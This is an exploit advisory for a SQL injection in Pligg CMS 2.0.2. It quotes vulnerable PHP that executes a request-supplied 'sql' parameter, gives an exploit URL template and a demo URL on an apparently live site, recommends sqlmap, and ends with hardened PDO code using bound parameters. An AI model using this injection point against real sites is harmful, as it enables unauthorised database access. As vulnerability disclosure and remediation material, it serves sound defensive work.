Pligg CMS 2.0.2 - (load_data_for_search.php) SQL Injection

2015-09-18 19:05:03

# Exploit Title: Pligg CMS 2.0.2 SQL injection
# Date: 29-08-2015
# Exploit Author: jsass
# Vendor Homepage: http://pligg.com
# Software Link: https://github.com/Pligg/pligg-cms/archive/2.0.2.zip
# Version: 2.0.2
# Tested on: kali sana 2.0

################ Q8 Gray Hat Team ################



SQL Injection

File : load_data_for_search.php


$search = new Search();

// start_up and pagesize come straight from the request and are
// concatenated into the LIMIT clause without any validation.
if(isset($_REQUEST['start_up']) and $_REQUEST['start_up']!= '' and $_REQUEST['pagesize'] != ''){
    $pagesize = $_REQUEST['pagesize'];
    $start_up = $_REQUEST['start_up'];
    $limit = " LIMIT $start_up, $pagesize";
}

// The whole SQL statement is taken from the 'sql' request parameter.
if(isset($_REQUEST['sql']) and $_REQUEST['sql']!= ''){
    $sql = $_REQUEST['sql'];
    $search->sql = $sql.$limit;
}

$fetch_link_summary = true;
$linksum_sql = $sql.$limit;

Exploit : http://localhost/pligg-cms-master/load_data_for_search.php?sql={SQLi}

Injection Type : Boolean & Time Based

Use sqlmap to inject.

Demo : http://www.pligg.science/load_data_for_search.php?sql={SQLi}
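
A hardened counterpart to the excerpt from load_data_for_search.php, as an added example that is not Pligg's code or a vendor patch: the statement text is fixed on the server, and start_up and pagesize are accepted only as bounded integers. The PDO connection, the `links` table and its columns, the `q` parameter and the helper names are assumptions made for illustration.

```php
<?php
// Added example, not Pligg code. Table, columns and the 'q' parameter are hypothetical.
const MAX_PAGE_SIZE = 50;

// Accept a request value only if it is a plain integer within [$min, $max].
function int_param(array $req, string $name, int $default, int $min, int $max): int
{
    if (!isset($req[$name]) || $req[$name] === '') {
        return $default;
    }
    $v = filter_var($req[$name], FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]);
    if ($v === false) {
        throw new InvalidArgumentException("invalid $name");
    }
    return $v;
}

function search_links(PDO $pdo, array $req): array
{
    $start = int_param($req, 'start_up', 0, 0, PHP_INT_MAX);
    $size  = int_param($req, 'pagesize', 10, 1, MAX_PAGE_SIZE);
    $term  = isset($req['q']) && is_string($req['q']) ? $req['q'] : '';

    // The statement text is fixed server-side; the request supplies values only.
    $stmt = $pdo->prepare(
        'SELECT link_id, link_title FROM links
          WHERE link_title LIKE :term ORDER BY link_id DESC
          LIMIT :start, :size'
    );
    $stmt->bindValue(':term', '%' . $term . '%', PDO::PARAM_STR);
    $stmt->bindValue(':start', $start, PDO::PARAM_INT);
    $stmt->bindValue(':size', $size, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo data in an in-memory SQLite database (requires pdo_sqlite).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE links (link_id INTEGER PRIMARY KEY, link_title TEXT)');
$pdo->exec("INSERT INTO links (link_title) VALUES ('alpha'), ('beta'), ('alphabet')");
print_r(search_links($pdo, ['q' => 'alpha', 'start_up' => '0', 'pagesize' => '10']));
try {
    // Any 'sql' parameter is ignored; a non-integer paging value is rejected.
    search_links($pdo, ['sql' => 'SELECT 1', 'start_up' => '0 abc', 'pagesize' => '10']);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

The `%` and `_` characters in the search term still act as LIKE wildcards; they cannot change the structure of the statement.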



Greets To : sec4ever.com && alm3refh.com

Fixes

No fixes